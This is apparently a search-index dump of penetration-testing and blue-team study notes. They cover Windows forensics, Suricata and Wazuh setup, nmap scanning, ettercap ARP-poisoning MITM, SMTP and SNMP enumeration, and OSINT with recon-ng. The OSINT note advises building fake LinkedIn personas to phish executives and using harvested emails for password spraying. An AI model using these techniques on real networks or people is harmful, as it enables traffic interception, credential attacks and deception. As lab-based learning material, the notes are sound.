\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"wf_2\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_4/wf_2.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"network-parametersnetbios-name-cache-active-connections-routing-table-etc\"\u003eNetwork parameters(NetBIOS name cache, active connections, routing table etc):\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enbtstat -c\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -ano\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -rn\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eipconfig /all\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cem\u003ePromiscous mode detection on NICs through powershell:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eGet-NetAdapter\u003c/span\u003e \u003cspan class=\"p\"\u003e|\u003c/span\u003e \u003cspan class=\"nb\"\u003eFormat-List\u003c/span\u003e \u003cspan class=\"n\"\u003e-Property\u003c/span\u003e \u003cspan class=\"n\"\u003eifAlias\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ePromiscuousMode\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"sysinternal-tools\"\u003eSysinternal tools:\u003c/h3\u003e\n\u003ch4 id=\"logged-on-users-info\"\u003elogged on users info:\u003c/h4\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ePsLoggedon.exe -x\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003elogonsessions.exe -p\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enet sessions\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enet user user_name\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"wf_3\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_4/wf_3.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"hash-analysis\"\u003eHash analysis:\u003c/h3\u003e\n\u003cp\u003e\u003cem\u003eUsing powershell:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eGet-FileHash\u003c/span\u003e \u003cspan class=\"p\"\u003e.\\\u003c/span\u003e\u003cspan class=\"n\"\u003eFTK_sample_00\u003c/span\u003e\u003cspan class=\"p\"\u003e.\u003c/span\u003e\u003cspan class=\"py\"\u003eE01\u003c/span\u003e \u003cspan class=\"n\"\u003e-Algorithm\u003c/span\u003e \u003cspan class=\"n\"\u003eMD5\u003c/span\u003e \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eGet-FileHash\u003c/span\u003e \u003cspan class=\"p\"\u003e.\\\u003c/span\u003e\u003cspan class=\"n\"\u003eFTK_sample_00\u003c/span\u003e\u003cspan class=\"p\"\u003e.\u003c/span\u003e\u003cspan class=\"py\"\u003eE01\u003c/span\u003e \u003cspan class=\"n\"\u003e-Algorithm\u003c/span\u003e \u003cspan class=\"n\"\u003eSHA128\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"open-file-information\"\u003eOpen file information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enet file\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"list-of-running-processes-services\"\u003elist of running processes, services:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003etasklist /svc\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"scheduled-tasks-info\"\u003escheduled tasks info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eschtasks /query\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"history-checking\"\u003ehistory checking:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edoskey /history\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cem\u003eIn powershell:\u003c/em\u003e\u003c/p\u003e","title":"Practical Demo: Windows Forensics"},{"content":" Follow these commands step by step -\u0026gt; sudo apt-get install software-properties-common sudo add-apt-repository ppa:oisf/suricata-stable sudo apt-get update sudo apt-get install suricata It will be installed directly. Use the github repo testmynids.org to generate malicious traffic inside the network and monitor the alerts. Or follow the next steps for some adventure , adding custom rules and basic testing methods. Generating custom rules in suricata: ARP request alerts: Open the suricata.rules file, where we will add the rule: sudo vim /var/lib/suricata/rules/suricata.rules Add the following rule in your desired location inside the file: alert arp any any -\u0026gt; any any (msg:\u0026#34;LOCAL Testnet ARP Scanning Detected\u0026#34;; threshold: type both, track by_src, count 15, seconds 5; sid:1000002; rev:1;) Command debrief: \u0026ldquo;If any device sends 15 or more ARP packets within 5 seconds, generate an alert with ID 1000002.\u0026rdquo;\nEnable the ARP capturing: Save and exit.\nRestart suricata using the following command:\nsudo systemctl restart suricata command screenshots: Use the following command to generate traffic from anyother/same machine itself from terminal: sudo netdiscover -r 192.168.83.0/24 We can see the logs comming in. SSH bruteforce rule: Next add custom rule for logging SSH brute force attempts alert tcp any any -\u0026gt; any 22 (msg:\u0026#34;LOCAL SSH Brute Force Detected\u0026#34;; flags:S; flow:stateless; threshold: type both, track by_src, count 5, seconds 30; sid:1000003; rev:1;) We are checking for the initial handshake of TCP which is the SYN flag. count 5, seconds 30: Triggers if one IP tries to initiate 5 connections in 30 seconds. Again restart suricata after adding this rule. Integrating suricata with wazuh: I have integrated suricata logs directly inside wazuh, i\u0026rsquo;ll share now how i did that. It\u0026rsquo;s much easier to see the logs in a GUI pane rather than in a cli view.(my preference)\nNote You must have already configured wazuh properly.\nConfiguring the Wazuh-agent : Open the agent config file -\u0026gt; sudo vim /var/ossec/etc/ossec.conf Search inside vim \u0026lt;ossec-config\u0026gt; , if you don\u0026rsquo;t know how to search, simply press / and then write whatever you are looking for like this /\u0026lt;ossec-config\u0026gt; Then look for \u0026lt;localfile\u0026gt; block and add the suricata log location : \u0026lt;localfile\u0026gt; \u0026lt;log_format\u0026gt;json\u0026lt;/log_format\u0026gt; \u0026lt;location\u0026gt;/var/log/suricata/eve.json\u0026lt;/location\u0026gt; \u0026lt;/localfile\u0026gt; Save and exit Restart wazuh-agent using the following command: sudo systemctl restart wazuh-agent You can see the logs inside wazuh\u0026rsquo;s overview tab. Also to filter suricata specific logs , on the global search bar use the following command: rule.groups:suricata ","permalink":"https://0x-s0M3n4th.github.io/notes/blue-team-ops/03-suricata/00-installation--rule-creation/","summary":"\u003col\u003e\n\u003cli\u003eFollow these commands step by step -\u0026gt;\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt-get install software-properties-common\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo add-apt-repository ppa:oisf/suricata-stable\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt-get update\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt-get install suricata\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eIt will be installed directly.\u003c/li\u003e\n\u003cli\u003eUse the github repo \u003ccode\u003etestmynids.org\u003c/code\u003e to generate malicious traffic inside the network and monitor the alerts.\u003c/li\u003e\n\u003cli\u003eOr follow the next steps for some adventure , adding custom rules and basic testing methods.\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch2 id=\"generating-custom-rules-in-suricata\"\u003eGenerating custom rules in suricata:\u003c/h2\u003e\n\u003ch3 id=\"arp-request-alerts\"\u003eARP request alerts:\u003c/h3\u003e\n\u003col\u003e\n\u003cli\u003eOpen the \u003cstrong\u003esuricata.rules\u003c/strong\u003e file, where we will add the rule:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo vim /var/lib/suricata/rules/suricata.rules\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eAdd the following rule in your desired location inside the file:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ealert arp any any -\u0026gt; any any \u003cspan class=\"o\"\u003e(\u003c/span\u003emsg:\u003cspan class=\"s2\"\u003e\u0026#34;LOCAL Testnet ARP Scanning Detected\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e;\u003c/span\u003e threshold: \u003cspan class=\"nb\"\u003etype\u003c/span\u003e both, track by_src, count 15, seconds 5\u003cspan class=\"p\"\u003e;\u003c/span\u003e sid:1000002\u003cspan class=\"p\"\u003e;\u003c/span\u003e rev:1\u003cspan class=\"p\"\u003e;\u003c/span\u003e\u003cspan class=\"o\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cstrong\u003eCommand debrief: \u003cem\u003e\u0026ldquo;If any device sends 15 or more ARP packets within 5 seconds, generate an alert with ID 1000002.\u0026rdquo;\u003c/em\u003e\u003c/strong\u003e\u003c/p\u003e","title":"Practical Suricata"},{"content":" Using Netdiscover: sudo netdiscover -p -i interface_name{eth0} -p : Passive mode. Keep in mind that while passive network scanners help to maintain a level of stealth on a network, they don’t always detect live systems as compared to performing active scanning techniques. For instance, a targeted system may not be generating network traffic for many reasons. If a penetration tester is performing passive scanning only, there’s a possibility the targeted host may not be identified. NMAP ping sweep: nmap -sn 192.168.83.0/24 Nmap’s ping sweep does not send ICMP probes to the target; rather, it leverages TCP messages to determine whether specific ports are open on the targeted system. Therefore, if ICMP is restricted on a network, there’s a likelihood that TCP messages are permitted. Using nbtscan , the machines that can respond to NetBios like windows based machines, we can identify them on the network: sudo nbtscan 192.168.83.0/24 sudo nbtscan 192.168.83.138-141 let’s use Nmap to perform a port scan of the top 1,000 ports nmap 192.168.83.140 We can use the NMAP's -A option along with controlling the speed using -T option: nmap -A -T4 192.168.83.140 ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/04-live-host-discovery/","summary":"\u003col\u003e\n\u003cli\u003eUsing \u003ccode\u003eNetdiscover\u003c/code\u003e:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo netdiscover -p -i interface_name\u003cspan class=\"o\"\u003e{\u003c/span\u003eeth0\u003cspan class=\"o\"\u003e}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003ccode\u003e-p\u003c/code\u003e : Passive mode.\nKeep in mind that while passive network scanners help to maintain a level of stealth on a network, they don’t always detect live systems as compared to performing active scanning techniques. For instance, a targeted system may not be generating network traffic for many reasons. If a penetration tester is performing passive scanning only, there’s a possibility the targeted host may not be identified.\n\u003cimg alt=\"lh_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/04/lh_1.png\"\u003e\u003c/p\u003e","title":"Live Host Discovery"},{"content":"When connected to a network, whether it is wired or wireless, there are a lot of packets being sent back and forth between hosts. Some of these packets may contain sensitive and confidential information, such as usernames, passwords, password hashes, and documents, which are valuable to a penetration tester. While there are many secure network protocols that provide data encryption, there are many insecure network protocols that transmit data in plaintext.\nWhile networking technologies have evolved over time, this is not the case for many network protocols with the Transmission Control Protocol/Internet Protocol (TCP/IP) protocol suite and the Open Systems Interconnection (OSI) networking model. There are many applications and services that operate on a client-server model that send sensitive data in plaintext, allowing a penetration tester to both intercept and capture such data. Capturing user credentials and password hashes will allow you to easily gain access to clients and servers within the organization’s network. As shown in the preceding diagram, if the Windows host wants to communicate with the web server, both devices need to know the Media Access Control (MAC) address of each other. Because a Local Area Network (LAN) is mostly made up of switches that operate at Layer 2 of the OSI networking model, these devices only read the MAC addresses found within the Layer 2 header of the frame – not the IP addresses within the Layer 3 header. Therefore, for communication with two or more devices on the same network, the destination MAC address is vital for the switch to make its forwarding decision.\nIf a device such as the Windows host does not know the MAC address of the web server, it will broadcast an Address Resolution Protocol (ARP) request message to all devices within the same network segment (also known as a broadcast domain). The ARP request message will contain the destination host’s IP address, which is referred to as the target IP address. The host on the network that is assigned/configured with the target IP address will respond with its MAC address with an ARP reply message. Within each host device, there is an ARP cache, which temporarily stores the IP-to-MAC address mapping of devices.\nImportant ARP is a network protocol used to resolve IP addresses to MAC addresses within a network. Most host devices have a default inactivity timer of 300 seconds on their ARP cache.\nHowever, ARP is one of the many protocols that wasn’t designed with security in mind. Penetration testers can modify the entries within the ARP cache within a network host machine.\nThe following are the phases of a MITM attack:\nTo perform a MITM attack, the penetration tester needs to ensure their attack system, such as Kali Linux, is connected to the same network as the targets. Next, the attacker sends gratuitous ARP messages that contain false IP-to-MAC address information. The attacker will send gratuitous ARP messages to the Windows host and to the web server with their MAC ADDRESSES Once both targets’ ARP cache is poisoned with the false information, their traffic is sent through the attacker’s machine when both targets are communicating with each other, as shown: This attack allows the penetration tester to intercept all communications between multiple hosts on the network and simply forward the packets to their destinations! An unsuspecting user will not be aware that their traffic is being intercepted. While intercepting network packets, penetration testers usually run a packet capture/sniffer tool, such as the following: Wireshark: A free graphical user interface tool used by both networking and cybersecurity professionals to capture network packets and perform protocol analysis and troubleshooting. In addition to packet capture and analysis, Wireshark offers features such as protocol dissection, filtering, and statistical analysis. These capabilities are important for identifying patterns, anomalies, and potential security issues within network traffic. Tcpdump: A command line-based tool that allows cybersecurity professionals to capture network traffic for analysis. Intercepting traffic with MiTM attacks: Power on kali linux, Metasploitable 2 linux and THESPIDERMAN machine. Then identify the ip + MAC address of those machines using nmap nmap -sn 172.30.1.0/24 3. On Kali Linux, use the following Ettercap commands to perform a MiTM attack between the two targets:\nsudo ettercap -i eth2 -T -q -S -M arp:remote /172.30.1.134// /172.30.1.129// COMMAND BREAKDOWN: • -i: Allows you to specify the interface on your attacker machine that is connected to the network with your targets. • -T: Specifies the user interface as text-based output only. • -q: Specifies quiet mode, which does not print the packet information on the terminal. • -S: Specifies not to perform Secure Sockets Layer (SSL) forging. • -M arp:remote: Specifies to perform a MITM attack using ARP poisoning of the target’s cache and sniffer remote IP connections. The remote command is usually used when performing a MITM attack between a client and a gateway. 4. Next, open Wireshark on Kali Linux and start capturing packets on eth2, which is connected to the 172.30.1.0/24 network: 5. Open the web browser in kali and search http://metasploitable-2-linux_ip/ to generate traffic in between. 6. Let’s verify Ettercap is performing ARP poisoning on the Windows host. The following screenshot shows the ARP cache on THESPIDERMAN virtual machine: 7. Let\u0026rsquo;s see that arp traffic for windows machine: DNS TUNNELING: DNS tunneling is a type of cyberattack that allows hackers to bypass network security by using the Domain Name System (DNS) as a transport for malicious traffic. By hiding non-DNS traffic within DNS packets, attackers can often bypass network security measures. Successful DNS tunneling attacks allow hackers to bypass network security, exfiltrate data, control other computers, collect user credentials, or explore a network’s footprint for future attacks. What are DNS queries and DNS traffic? DNS is like GPS for the internet. DNS servers translate the human-readable names that users type into a web browser into machine-readable IP addresses — a string of numbers such as 2001:db8:3e8:2a3::b63 — that allow the browser to load the correct site. DNS lets people navigate the web using easy-to-remember domain names rather than keeping track of the IP address for the sites they want to visit. How do hackers use DNS tunneling? DNS tunneling enables attackers to perform a variety of malicious activities.\nInstalling malware. Attackers may use DNS tunneling to install malware on additional systems. Collecting credentials. Once they have command and control of a device, attackers can use keyloggers and other methods to collect user credentials that can be used to mount additional attacks or be sold on the dark web. Exploring the network. DNS queries from within an infected network can help attackers build a map of the network, identifying systems and high-value assets. Exfiltrating data. Cybercriminals may use DNS tunneling to transfer data out of the network, including sensitive or confidential user information. Controlling devices. With the ability to control an infected device, attackers can trigger other threats such as DDoS attacks. CREDITS: akamai-dns-tunneling-blog\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/04-mitm-attacks/","summary":"\u003cp\u003eWhen connected to a network, whether it is wired or wireless, there are a lot of packets being sent back and forth between hosts. Some of these packets may contain sensitive and confidential information, such as usernames, passwords, password hashes, and documents, which are valuable to a penetration tester. While there are many secure network protocols that provide data encryption, there are many insecure network protocols that transmit data in plaintext.\u003c/p\u003e","title":"MITM Attacks"},{"content":"After discovering the hosts on a network, the next phase is to identify any open service ports on the target system and determine which services are mapped to those open ports. There are various techniques that a penetration tester can use to identify the open ports on a target system. Some techniques are manual, while others can simply be automated using the Nmap tool\nBasic nmap scan, this will perform a scan of the 1000 commonly used ports: nmap 172.30.1.134 Tip As an aspiring ethical hacker and penetration tester, if you\u0026rsquo;re not familiar with some of the services discovered from a scan, you must perform research to gain a better understanding of a service role and its functionality on a system and network.\nLet\u0026rsquo;s perform an advance scan to determine the target\u0026rsquo;s OS, service version, script scanning: nmap -A -T4 -p- 172.30.1.134 SYNTAX BREAKDOWN:\n–A: This enables Nmap to profile the target to identify its operating system, service versions, and script scanning, as well as perform a traceroute. -T: This syntax specifies the timing options for the scan, which ranges from 0 – 5, where 0 is very slow and 5 is the fastest. This command is good for preventing too many probes from being sent to the target too quickly. -p: Using the –p syntax allows you to specify which port(s) to identify as opened or closed on a target. You can specify –p80 to scan for port 80 only on the target and –p- to scan for all 65,535 open ports on a target. Important By default, Nmap performs scans on Transmission Control Protocol (TCP) ports only. Therefore, if a target is running a service on a User Datagram Protocol (UDP) server port, there\u0026rsquo;s a possibility you will miss it. To perform a scan on a port or range of UDP ports, such as to scan for UDP port 53, use the –p U:53 command.\nIt was also able to perform banner grabbing and determine whether there\u0026rsquo;s an authentication system/login mechanism for each service. Now after seeing the information, we can look for version specific exploits/ any credentials that can come in handy. Important SMB is a TCP/IP network protocol that is used to allow file and printer sharing services between host devices on a network. Discovering SMB on a host system is an indication there many a file share located on the target system, and it\u0026rsquo;s something worth checking out.\nThe following is some additional syntax that can be used with Nmap to gather specific information:\n-Pn: This command performs a scan on the target without sending an ICMP Echo Request (ping) message. This command is useful for scanning systems that have ICMP responses disabled. -sU: This command allows Nmap to perform a UDP port scan on the target. This command is useful for identifying any services that use UDP compared to TCP. -p : This command allows a penetration tester to scan a single port or range such as –p80, -p 80,443,8080, or –p 100-200. -sV: This command allows Nmap to send special probes to identify the service versions of any open ports on the target system. -O: This command allows Nmap to identify and profile the operating system on the target system. -6: This command enables Nmap to perform scanning on a system or network that has an IPv6 address. By identifying the operating systems of targets, penetration testers can create an exploit and payload that are designed to work efficiently on those specific operating systems. Simply put, an exploit or payload for a Windows operating system will most likely not work on a Linux-based system and vice versa. Enumerating SMTP service: Using netact: nc -nv 172.30.1.134 25 Inside netcat use this command VRFY root to verify user: As shown in the preceding screenshot, netcat is able to successfully establish a connection to the targeted system on port 25, which further identifies that the SMTP is running. When the VRFY root command is executed, the email service responses indicate that the user exists. Note When performing SMTP enumeration, there are various commands that enable us to verify whether a valid user exists or not. For instance, the VRFY command is used to determine whether a valid user exists on the email server. The EXPN command is used to identify the delivery address for an email alias. The RCPT TO command is used to point to a recipient’s email address.\nIt\u0026rsquo;s very hectic to manually look for users, rather than that use a bash script that will enumerate the users in SMTP: Install the script from The ultimate kali book's github account Give executable permission to the script chmod +x smtp_user_enum.sh Convert the Script to linux style as it\u0026rsquo;s having windows style Line endings using this command dos2linux smtp_user_enum.sh Now execute the code as shown in the following screenshot: command: ./smtp_user_enum.sh target_ip wordlist_directory In my case it didn\u0026rsquo;t return anything Enumerating SNMP service: SNMP is a common network protocol that enables network professionals to monitor, manage, and troubleshoot common networking devices. In addition, IT professionals use SNMP to retrieve sensitive information from their devices, such as the following: • System uptime • Device hostname • CPU and memory utilization • Interface status and statistics • Operating system • Open ports and running services\nChecking if SNMP is running or not: nmap -sU -p 161 172.30.1.134 COMMAND BRIEF:\n-sU : checks for UDP connection -p : We need to provide here the port number for SNMP default port. Next, perform SNMP enumeration using the SNMP-Check tool: snmp-check -p 161 -c public -v 1 172.30.1.134 COMMAND BREAKDOWN: • -p: This allows you to specify the targeted port; by default, it’s set to port 161. • -c: This allows you to specify the community string to log in to the targeted system; the default community string is public. • -v: This allows you to specify the SNMP version to use; by default, it’s set to version 1.\nThe SNMP-Check tool was able to enumerate the following information from the target: • System information • User accounts • Network information • Routing information • Network services • Running processes • Software components\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/04-probing-open-services-ports-and-os/","summary":"\u003cp\u003eAfter discovering the hosts on a network, the next phase is to identify any open service ports on the target system and determine which services are mapped to those open ports. There are various techniques that a penetration tester can use to identify the open ports on a target system. Some techniques are manual, while others can simply be automated using the Nmap tool\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eBasic \u003ccode\u003enmap\u003c/code\u003e scan, this will perform a scan of the \u003ccode\u003e1000\u003c/code\u003e commonly used ports:\n\u003cimg alt=\"op_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/04/op_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap 172.30.1.134\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition tip\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 384 512\"\u003e\u003cpath d=\"M272 384c9.6-31.9 29.5-59.1 49.2-86.2c0 0 0 0 0 0c5.2-7.1 10.4-14.2 15.4-21.4c19.8-28.5 31.4-63 31.4-100.3C368 78.8 289.2 0 192 0S16 78.8 16 176c0 37.3 11.6 71.9 31.4 100.3c5 7.2 10.2 14.3 15.4 21.4c0 0 0 0 0 0c19.8 27.1 39.7 54.4 49.2 86.2l160 0zM192 512c44.2 0 80-35.8 80-80l0-16-160 0 0 16c0 44.2 35.8 80 80 80zM112 176c0 8.8-7.2 16-16 16s-16-7.2-16-16c0-61.9 50.1-112 112-112c8.8 0 16 7.2 16 16s-7.2 16-16 16c-44.2 0-80 35.8-80 80z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eTip\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eAs an aspiring ethical hacker and penetration tester, if you\u0026rsquo;re not familiar with some of the services discovered from a scan, you must perform research to gain a better understanding of a service role and its functionality on a system and network.\u003c/p\u003e","title":"Probing Open Services, Ports \u0026 OS"},{"content":"Gathering data using whois: whois command helps us to find publicly available data about domains. The following is a brief list of some information types that are usually stored for public records:\nRegistrant contact information Administrative contact information Technical contact information Name servers Important dates, such as registration, update, and expiration dates Registry domain ID Registrar information Kali is having a built-in whois tool: Info Keep in mind that, as the need for online privacy increases around the world, domain registrars and organizations are paying a premium fee to ensure their contact data is not revealed by WHOIS databases to the general public. This means that you will not commonly find private contact data about domains that are no longer being revealed on WHOIS databases if the domain owner pays the premium for additional privacy features.\nTip Take advantage of publicly available informations like job portals(from where we can get info about the company\u0026rsquo;s technical gadgets, employee requirements, their contact info, what kind of tech they are using currently etc). Make sock puppets inside linkedin and connect with high privilege individuals, try to phish them etc. Take as much advantage as possible from the public info. Make a threat model using those stuff .\nQuite often, you will notice that employees who are in a leadership role will commonly share their contact details on professional social networking sites, such as the following:\nFull name Job title Company\u0026rsquo;s email address Telephone number Roles and responsibilities Projects containing technical details Pictures of their employee badge As a penetration tester, it\u0026rsquo;s quite simple to create an account that will function as a sock puppet on a site such as LinkedIn, populate some false information on the account, such as information stating you\u0026rsquo;re an employee who is working at another branch office, and then add some low-level employees to the organization. There is a possibility the employees will automatically accept the connection/friend request because they will see that you\u0026rsquo;re a fellow employee at their company. This will provide some leverage for you to connect with the high-profile employees of the target organization and attempt various types of social engineering tactics. Hunter.io We can find a particular company\u0026rsquo;s employee\u0026rsquo;s info. As shown in the preceding screenshot, Hunter can provide a list of employees\u0026rsquo; information, such as their names, email addresses, telephone numbers, and other sources of information. Furthermore, Hunter.io provides the format of employees\u0026rsquo; email addresses. Such information is also useful when attempting password spraying and credential stuffing techniques. Recon-ng Recon-ng is an OSINT reconnaissance framework written in Python. To use recon-ng : recon-ng [recon-ng][default] \u0026gt; marketplace install all # this will install all the modules of recon-ng 2. To see the installed modules inside recon-ng use the command modules search :\n3. we can create separate workspaces inside this tool just like metasploit: 4. To see the list of workspaces use the command workspaces list Tip The workspaces load \u0026lt;workspace-name\u0026gt; command allows you to select and work in the specific workspace, while the workspaces remove \u0026lt;workspace-name\u0026gt; command removes a workspace from Recon-ng.\nWe can search for any modules using the command modules search \u0026lt;module_name\u0026gt; To use a specific module within Recon-ng, use the modules load command. Let\u0026rsquo;s gather a list of point-of-contacts (POCs) for a target domain. Use the following commands to use the POCS module: To set the requirements for the POCS module, use the following command to set microsoft.com as SOURCE for our target: Tip To unset a value within a module, use the option unset \u0026lt;parameter\u0026gt; command. Ensure that you use the info command to verify whether the parameter value is set or unset within a module.\nTo exit the recon-ng module use the command back To see the stored credentials for example the contacts we found -\u0026gt; use show contacts How we can add different service\u0026rsquo;s API keys inside recon-ng: Tip To view a list of all supported API modules and their keys on Recon-ng, use the keys list command. To add an API key to Recon-ng, use the keys add \u0026lt;API module name\u0026gt; \u0026lt;API key value\u0026gt; command.\nShow command: Tip The show command can be used with show [companies] [credentials] [hosts] [locations] [ports] [pushpins] [vulnerabilities] [contacts] [domains] [leaks] [netblocks] [profiles] [repositories] to view specific information that was obtained by Recon-ng.\nTo view a summary of your activities, use the dashboard command: Generating a report inside recon-ng: Use this module command modules search report Now we need to load the module we want to export as, i want it as html so i will use this command to load it modules load reporting/html , then we can use the command info to see the details we need to set before running the module: We will set the details using these commands : options set CREATOR 0xdf , options set CUSTOMER MS-Target , options set FILENAME saving_location : then hit run The report recon-web recon-ng is having it\u0026rsquo;s own web interface called recon-web , we can access it by typing this following command inside the terminal recon-web This will start a web server Open it on your browser, DONE 